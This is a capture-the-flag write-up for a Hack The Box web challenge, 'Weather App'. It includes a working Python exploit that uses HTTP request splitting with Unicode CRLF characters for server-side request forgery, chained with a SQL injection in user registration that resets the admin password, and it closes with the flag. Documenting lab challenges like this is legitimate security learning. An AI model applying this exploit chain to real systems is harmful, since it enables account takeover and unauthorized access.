Weather App

kali@kali:~/0.htb/challenges/Web/Weather_App/web_weather_app$ sudo ./build-docker.sh
then access the challenge at http://127.0.0.1:1337 

Now, let's dig into the code. This is a Node.js app using express, so we can see all 4 available routes at routes/index.js.
/, /register, /login, /api/weather

Let's take a look at the database functions inside database.js:
the username column is UNIQUE and that there is already an user with username 'admin'.

isAdmin() function is not vulnerable to injection, since it uses '?' to insert the parameters in the query and they already sanitize escape quotes. However, register() function does, since it doesn't use '?'. This means that we can only inject malicious payloads into the database by registering a new user.

Server-Side Request Forgery
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
https://github.com/hacefresko/HTB-Web-WriteUps/blob/main/Weather%20App/Weather%20App.md

ssrf.py
import requests

url = 'http://138.68.182.108:31439'

username = "admin"
password = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"

parsedUsername = username.replace(" ","\u0120").replace("'","%27").replace("'","%22")
parsedPassword = password.replace(" ","\u0120").replace("'","%27").replace("'","%22")
contentLength = len(parsedUsername) + len(parsedPassword) + 19

endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010Ausername=' + parsedUsername + '&password=' + parsedPassword + '\u010D\u010A\u010D\u010AGET\u0120/?lot=' 
r = requests.post(url + '/api/weather', json={ 'endpoint': endpoint, 'city' : 'lol', 'country' : 'lol'})

kali@kali:~/0.htb/challenges/Web/Weather_App$ python3 ssrf.py

http://138.68.182.108:31439/login
username admin password admin

HTB{w3lc0m3_t0_th3_p1p3_dr34m} 

Navigation